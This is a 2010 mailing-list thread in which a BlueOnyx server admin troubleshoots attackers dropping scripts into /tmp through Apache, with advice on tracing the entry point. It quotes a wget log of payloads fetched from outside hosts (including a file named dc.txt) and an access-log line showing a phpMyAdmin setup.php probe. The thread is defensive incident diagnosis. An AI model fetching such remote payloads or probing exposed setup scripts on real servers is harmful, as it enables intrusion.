On Mon, 2010-11-29 at 09:44 -0800, Ken - Precision Web Hosting, Inc wrote: > ----- Original Message ----- > From: "Gerald Waugh" <[email protected]> > To: "BlueOnyx General Mailing List" <[email protected]> > Sent: Monday, November 29, 2010 9:28 AM > Subject: [BlueOnyx:05934] Re: hacker scripts > > > > > > On Mon, 2010-11-29 at 11:23 -0600, Gerald Waugh wrote: > >> On Mon, 2010-11-29 at 17:17 +0000, Steve Howes wrote: > >> > On 29 Nov 2010, at 17:08, Gerald Waugh wrote: > >> > > How can I stop these people from downloading and running their > >> > > scripts > >> > > in /tmp using httpd > >> > > >> > You need to find out how they did it. You're either hosting someone > >> > naughty, or someone who has an insecure script. Who owns the files? > >> > > >> apache.apache > >> > >> The server has a site with Drupal and some other blog stuff > >> > > > > /tmp type ext3 (rw,noexec,nosuid) > > > > > > > > [Mon Nov 29 05:50:25 2010] [error] [client 208.80.194.26] File does not > > exist: > > /home/.sites/132/site96/web/trio.htm&h=300&w=305&sz=49&hl=en&start=526 > > --06:02:38-- http://193.136.136.86/quixplorer/readme.txt > > => `readme.txt' > > Connecting to 193.136.136.86:80... connected. > > HTTP request sent, awaiting response... 200 OK > > Length: 27,931 (27K) [text/plain] > > > > 0K .......... .......... ....... 100% > > 56.99 > > KB/s > > > > 06:02:39 (56.99 KB/s) - `readme.txt' saved [27931/27931] > > > > --06:02:39-- http://realezsites.com/pers/cowtipper524/dc.txt > > => `dc.txt' > > Resolving realezsites.com... 64.235.52.10 > > Connecting to realezsites.com|64.235.52.10|:80... connected. > > HTTP request sent, awaiting response... 200 OK > > Length: 2,140 (2.1K) [text/plain] > > > > 0K .. 100% > > 2.40 > > MB/s > > > > 06:02:39 (2.40 MB/s) - `dc.txt' saved [2140/2140] > > > > -- > > Gerald > > > > > Look at the time the files in the /tmp were created. Then look in your > access logs and see what site / php script was accessed at that time. > > Check your drupal version and search on Google for > "Exploits for Drupal version xxx" >
[29/Nov/2010:06:02:37 -0600] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 200 14061 "http://208.67.252.235/phpmyadmin/scripts/setup.php"; "Opera" looks like its the phpmyadmin thing, I will have to find and move it... _______________________________________________ Blueonyx mailing list [email protected] http://www.blueonyx.it/mailman/listinfo/blueonyx
